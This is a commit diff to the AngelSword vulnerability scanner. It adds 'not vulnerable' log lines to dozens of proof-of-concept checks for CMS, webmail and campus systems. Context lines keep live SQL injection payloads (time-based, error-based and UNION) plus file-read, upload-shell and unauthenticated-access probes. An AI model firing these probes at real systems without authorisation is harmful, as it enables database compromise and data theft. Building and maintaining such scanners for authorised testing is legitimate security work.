update

AngelSword.py

@@ -48,6 +48,10 @@ hardwarepool = ThreadPool(threads_num)
 #informationpool = ThreadPool()
 informationpool = ThreadPool(threads_num)
 
+def split_string(strLine):
+    pattern = r"[a-z_]+BaseVerify"
+    return str(re.findall(pattern, strLine)).replace("_BaseVerify", "").replace("['","").replace("']","")
+
 def informationprint(informationname):
     msg = ">>>Scanning information vulns.."
     sys.stdout.write(msg+informationname+" "*(len(msg)+10)+"\r")
@@ -198,8 +202,8 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
         cmsclass = pocclass.cmspocdict
         print("\t\t\tCMS POC")
         for cms in cmsclass:
-            print("|"+cms+"")
-            print("|---------------------------------------------------------------------|")
+            print("|"+cms+"\t|\t"+split_string(str(cmsclass.get(cms).__str__)))
+            print("|-------------------------------------------------------------------------------------------------------------|")
         print("\r")
 
         #列出industrial POC名称
@@ -207,8 +211,8 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
         industrialclass = pocclass.industrialpocdict
         print("\t\t\tIndustrial POC")
         for industrial in industrialclass:
-            print("|"+industrial+"")
-            print("|---------------------------------------------------------------------|")
+            print("|"+industrial+"\t|\t"+split_string(str(industrialclass.get(industrial).__str__)))
+            print("|-------------------------------------------------------------------------------------------------------------|")
         print("\r")
 
         #列出SYSTEM POC名称
@@ -216,8 +220,8 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
         systemclass = pocclass.systempocdict
         print("\t\t\tSYSTEM POC")
         for system in systemclass:
-            print("|"+system+"")
-            print("|---------------------------------------------------------------------|")
+            print("|"+system+"\t|\t"+split_string(str(systemclass.get(system).__str__)))
+            print("|-------------------------------------------------------------------------------------------------------------|")
         print("\r")
 
         #列出HARDWARE POC名称
@@ -225,9 +229,10 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
         hardwareclass = pocclass.hardwarepocdict
         print("\t\t\tHARDWARE POC")
         for hardware in hardwareclass:
-            print("|"+hardware+"")
-            print("|---------------------------------------------------------------------|")
+            print("|"+hardware+"\t|\t"+split_string(str(hardwareclass.get(hardware).__str__)))
+            print("|-------------------------------------------------------------------------------------------------------------|")
         print("\r")
+
     elif sys.argv[1] == "-s" and sys.argv[2]:
         keywords = sys.argv[2].strip()
         count = 0

README.md

@@ -14,19 +14,7 @@ MAC Linux
 
 
 # 需要用到的模块
-bs4
-json
-redis
-urllib
-pexpect
-termcolor
-hashlib
-telnetlib
-pymysql
-pymongo
-elasticsearch
-paramiko
-
+requirements.txt
 
 # 说明
 1.部分代码参考网上公开的脚本。

cms/Hishop/hishop_productlist_sqli.py

@@ -23,9 +23,11 @@ class hishop_productlist_sqli_BaseVerify:
 
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在Hishop SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在hishop_productlist_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/PKPMBS/pkpmbs_MsgList_sqli.py

@@ -30,9 +30,11 @@ class pkpmbs_MsgList_sqli_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"GAOJIMicrosoft" in req.text:
                 cprint("[+]存在pkpmbs建设工程质量监督系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在pkpmbs_MsgList_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/PKPMBS/pkpmbs_addresslist_keyword_sqli.py

@@ -30,9 +30,11 @@ class pkpmbs_addresslist_keyword_sqli_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"GAOJIMicrosoft" in req.text:
                 cprint("[+]存在pkpmbs建设工程质量监督系统注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在pkpmbs_addresslist_keyword_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/PKPMBS/pkpmbs_guestbook_sqli.py

@@ -23,9 +23,11 @@ class pkpmbs_guestbook_sqli_BaseVerify:
 
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在PKPMBS SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在pkpmbs_guestbook_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/acsoft/acsoft_GetFileContent_fileread.py

@@ -30,9 +30,11 @@ class acsoft_GetFileContent_fileread_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在安财软件GetFileContent任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在acsoft_GetFileContent_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/acsoft/acsoft_GetFile_fileread.py

@@ -30,9 +30,11 @@ class acsoft_GetFile_fileread_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在安财软件GetFile任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在acsoft_GetFile_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/acsoft/acsoft_GetXMLList_fileread.py

@@ -29,9 +29,11 @@ class acsoft_GetXMLList_fileread_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在安财软件GetXMLList任意文件读取漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在acsoft_GetXMLList_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/autoset/autoset_phpmyadmin_unauth.py

@@ -32,9 +32,11 @@ class autoset_phpmyadmin_unauth_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"li_server_type" in req.text:
                 cprint("[+]存在韩国autoset建站程序phpmyadmin任意登录漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在autoset_phpmyadmin_unauth漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/cmseasy/cmseasy_header_detail_sqli.py

@@ -31,9 +31,11 @@ class cmseasy_header_detail_sqli_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在cmseasy header.php 报错注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在cmseasy_header_detail_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/dedecms/dedecms_download_redirect.py

@@ -26,8 +26,11 @@ class dedecms_download_redirect_BaseVerify:
             if r"www.baidu.com" in req.text:
                 cprint("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: "+vulnurl, "blue")
 
+            else:
+                cprint("[-]不存在dedecms_download_redirect漏洞", "white", "on_grey")
+
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/dedecms/dedecms_error_trace_disclosure.py

@@ -25,9 +25,11 @@ class dedecms_error_trace_disclosure_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"<?php  exit()" in req.text:
                 cprint("[+]存在dedecms trace爆路径漏洞...(信息)\tpayload: "+vulnurl, "green")
+            else:
+                cprint("[-]不存在dedecms_error_trace_disclosure漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/dedecms/dedecms_recommend_sqli.py

@@ -28,9 +28,11 @@ class dedecms_recommend_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在dedecms_recommend_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/dedecms/dedecms_search_typeArr_sqli.py

@@ -25,9 +25,11 @@ class dedecms_search_typeArr_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"Error infos" in req.text and r"Error sql" in req.text:
                 cprint("[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在dedecms_search_typeArr_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/dedecms/dedecms_version.py

@@ -52,9 +52,11 @@ class dedecms_version_BaseVerify:
             m = re.search("^(\d+)$", req.text)
             if m:
                 cprint("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s"%(m.group(1), self.check_ver(m.group(1))), "green")
+            else:
+                cprint("[-]不存在dedecms_version漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/digital_campus/digital_campus_log_disclosure.py

@@ -28,9 +28,11 @@ class digital_campus_log_disclosure_BaseVerify:
             result = pattern.findall(req.text)
             if len(result) != 0:
                 cprint("[+]存在Digital Campus2.0 Platform日志文件泄露...(中危)\tpayload: "+vulnurl, "yellow")
+            else:
+                cprint("[-]不存在digital_campus_log_disclosure漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/digital_campus/digital_campus_systemcodelist_sqli.py

@@ -36,6 +36,8 @@ class digital_campus_systemcodelist_sqli_BaseVerify:
         if r"DayNum" in reqlst[0] and r"DayNum" in reqlst[1]:
             if len(reqlst[0]) != len(reqlst[1]):
                 cprint("[+]存在Digital-Campus数字校园平台SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在digital_campus_systemcodelist_sqli漏洞", "white", "on_grey")
 
         payload = "/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy&paramFileName=1&paramValue=1%27%20AnD%201=CoNvErt(Int,@@version)--&paramRturnValue=1"
         vulnurl = self.url + payload
@@ -43,9 +45,11 @@ class digital_campus_systemcodelist_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.status_code == 500 and r"Microsoft SQL Server" in req.text:
                 cprint("[+]存在Digital-Campus数字校园平台SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在digital_campus_systemcodelist_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         payload = "/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy&paramFileName=1&paramValue=1%27;WaItFor%20DeLaY%20%270:0:6%27--&paramRturnValue=1"
         vulnurl = self.url + payload
@@ -54,9 +58,11 @@ class digital_campus_systemcodelist_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if time.time() - start_time >= 6:
                 cprint("[+]存在Digital-Campus数字校园平台SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在digital_campus_systemcodelist_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         payload = "/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy&paramFileName=1&paramValue=1%27%20WaItFor%20DeLaY%20%270:0:6%27--&paramRturnValue=1"
         vulnurl = self.url + payload
@@ -65,9 +71,11 @@ class digital_campus_systemcodelist_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if time.time() - start_time >= 6:
                 cprint("[+]存在Digital-Campus数字校园平台SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存digital_campus_systemcodelist_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         payload = "/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy&paramFileName=1&paramValue=-1%27%20UnIoN%20AlL%20SeLeCt%20CHAR(113)+CHAR(%2781dc9bdb52d04dc20036dbd8313ed055%27)+CHAR(113)+CHAR(118)+CHAR(113)+(CASE%20WHEN%20(CONCAT(NULL,NULL)=CONCAT(NULL,NULL))%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(112)+CHAR(113)--&paramRturnValue=1"
         vulnurl = self.url + payload
@@ -75,9 +83,11 @@ class digital_campus_systemcodelist_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在Digital-Campus数字校园平台SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在digital_campus_systemcodelist_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         payload = "/Code/Common/UpdateOnLine.aspx?Method=UpdateOnLineStatus&UserID=1%27;WaItFoR%20DeLaY%20%270:0:6%27--"
         vulnurl = self.url + payload
@@ -86,9 +96,11 @@ class digital_campus_systemcodelist_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if time.time() - start_time >= 6:
                 cprint("[+]存在Digital-Campus数字校园平台SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在digital_campus_systemcodelist_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/discuz/discuz_focus_flashxss.py

@@ -30,9 +30,11 @@ class discuz_focus_flashxss_BaseVerify:
             md5_value = hashlib.md5(data).hexdigest()
             if md5_value in flash_md5:
                 cprint("[+]存在discuz X3 focus.swf flashxss漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在discuz_focus_flashxss漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/discuz/discuz_forum_message_ssrf.py

@@ -34,9 +34,11 @@ class discuz_forum_message_ssrf_BaseVerify:
             reqr = requests.get(eye_url, timeout=10, verify=False)
             if md5_str in reqr.text:
                 cprint("[+]存在discuz论坛forum.php参数message SSRF漏洞...(中危)\tpayload: "+vulnurl, "yellow")
+            else:
+                cprint("[-]不存在discuz_forum_message_ssrf漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/discuz/discuz_plugin_ques_sqli.py

@@ -26,9 +26,11 @@ class discuz_plugin_ques_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
                 cprint("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在discuz_plugin_ques_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/discuz/discuz_x25_path_disclosure.py

@@ -30,9 +30,11 @@ class discuz_x25_path_disclosure_BaseVerify:
                 pattern = re.search('Fatal error.* in <b>([^<]+)</b> on line <b>(\d+)</b>', req.text)
                 if pattern:
                     cprint("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: "+vulnurl+"\tGet物理路径: "+pattern.group(1), "green")
+                else:
+                    cprint("[-]不存在discuz_x25_path_disclosure漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/diyou/dyp2p_latesindex_sqli.py

@@ -23,9 +23,11 @@ class dyp2p_latesindex_sqli_BaseVerify:
 
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在帝友P2P借贷系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在dyp2p_latesindex_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/diyou/dyp2p_url_fileread.py

@@ -23,9 +23,11 @@ class dyp2p_url_fileread_BaseVerify:
 
             if r"common.inc.php" in req.text:
                 cprint("[+]存在帝友P2P借贷系统任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在dyp2p_url_fileread漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/dreamgallery/dreamgallery_album_id_sqli.py

@@ -25,9 +25,11 @@ class dreamgallery_album_id_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在dreamgallery album.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在dreamgallery_album_id_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/dswjcms/dswjcms_p2p_multi_sqli.py

@@ -29,9 +29,11 @@ class dswjcms_p2p_multi_sqli_BaseVerify:
                 req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
                 if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                     cprint("[+]存在Dswjcms p2p网贷系统注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+                else:
+                    cprint("[-]不存在dswjcms_p2p_multi_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/ecscms/ecscms_MoreIndex_sqli.py

@@ -25,9 +25,11 @@ class ecscms_MoreIndex_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在易创思ECScms MoreIndex SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在ecscms_MoreIndex_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/ecshop/ecshop_flow_orderid_sqli.py

@@ -29,9 +29,11 @@ class ecshop_flow_orderid_sqli_BaseVerify:
             req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在ecshop3.0 flow.php 参数order_id注入漏洞...(高危)\tpayload: "+vulnurl+ "\npost: "+json.dumps(post_data, indent=4), "red")
+            else:
+                cprint("[-]不存在ecshop_flow_orderid_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/ecshop/ecshop_uc_code_sqli.py

@@ -25,9 +25,11 @@ class ecshop_uc_code_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"updatexml" in req.text and r"XPATH" in req.text:
                 cprint("[+]存在ecshop uc.php参数code SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在ecshop_uc_code_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/esccms/esccms_selectunitmember_unauth.py

@@ -25,9 +25,11 @@ class esccms_selectunitmember_unauth_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"doPostBack" in req.text and r"gvUnitMember" in req.text:
                 cprint("[+]存在易创思教育建站系统未授权漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在esccms_selectunitmember_unauth漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/etmdcp/etmdcp_Load_filedownload.py

@@ -26,9 +26,11 @@ class etmdcp_Load_filedownload_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在ETMV9数字化校园平台任意下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在etmdcp_Load_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/eyou/eyou_admin_id_sqli.py

@@ -31,9 +31,11 @@ class eyou_admin_id_sqli_BaseVerify:
             req = requests.post(vulnurl, headers=headers, data=payload, timeout=10, verify=False)
             if time.time() - start_time >= 6:
                 cprint("[+]存在亿邮Defender系统SQL注入漏洞...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(payload, indent=4), "red")
+            else:
+                cprint("[-]不存在eyou_admin_id_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/eyou/eyou_resetpw.py

@@ -23,9 +23,11 @@ class eyou_resetpw_BaseVerify:
 
             if req.status_code == 200 and r"pw_intensity" in req.text:
                 cprint("[+]存在eyou邮件系统重置密码问题页面...(敏感信息)\tpayload: "+vulnurl, "green")
+            else:
+                cprint("[-]不存在eyou_resetpw漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/eyou/eyou_user_kw_sqli.py

@@ -25,9 +25,11 @@ class eyou_user_kw_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                 cprint("[+]存在亿邮mail5 user 参数kw SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在eyou_user_kw_sqli漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/eyou/eyou_weakpass.py

@@ -22,9 +22,11 @@ class eyou_weakpass_BaseVerify:
             req = requests.get(vulnurl, timeout=10, verify=False, allow_redirects=False)
             if req.status_code == 200 and r"@" in req.text:
                 cprint("[+]存在eyou邮件系统信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
+            else:
+                cprint("[-]不存在eyou_weakpass漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
         payload = "/sysinfo.html"
         vulnurl = self.url + payload
@@ -32,9 +34,11 @@ class eyou_weakpass_BaseVerify:
             req = requests.get(vulnurl, timeout=10, verify=False, allow_redirects=False)
             if req.status_code == 200 and r"系统基本信息检查" in req.text:
                 cprint("[+]存在eyou邮件系统信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
+            else:
+                cprint("[-]不存在eyou_weakpass漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/fastmeeting/fastmeeting_download_filedownload.py

@@ -25,9 +25,11 @@ class fastmeeting_download_filedownload_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if req.headers["Content-Type"] == "application/xml":
                 cprint("[+]存在好视通视频会议系统(fastmeeting)任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
+            else:
+                cprint("[-]不存在fastmeeting_download_filedownload漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/finecms/finecms_uploadfile.py

@@ -31,9 +31,11 @@ class finecms_uploadfile_BaseVerify:
             req2 = requests.get(shellpath, headers=headers, timeout=10, verify=False)
             if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
                 cprint("[+]存在FineCMS任意文件上传漏洞...(高危)\t\tpayload: "+shellpath, "red")
+            else:
+                cprint("[-]不存在finecms_uploadfile漏洞", "white", "on_grey")
 
         except:
-            cprint("[-] "+__file__+"====>连接超时", "cyan")
+            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
 
 if __name__ == "__main__":
     warnings.filterwarnings("ignore")

cms/foosun/foosun_City_ajax_sqli.py

@@ -27,9 +27,11 @@ class foosun_City_ajax_sqli_BaseVerify:
             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
             if time.time() - start_time >= 6:
                 cprint("[+]存在Dotnetcms(风讯cms)SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
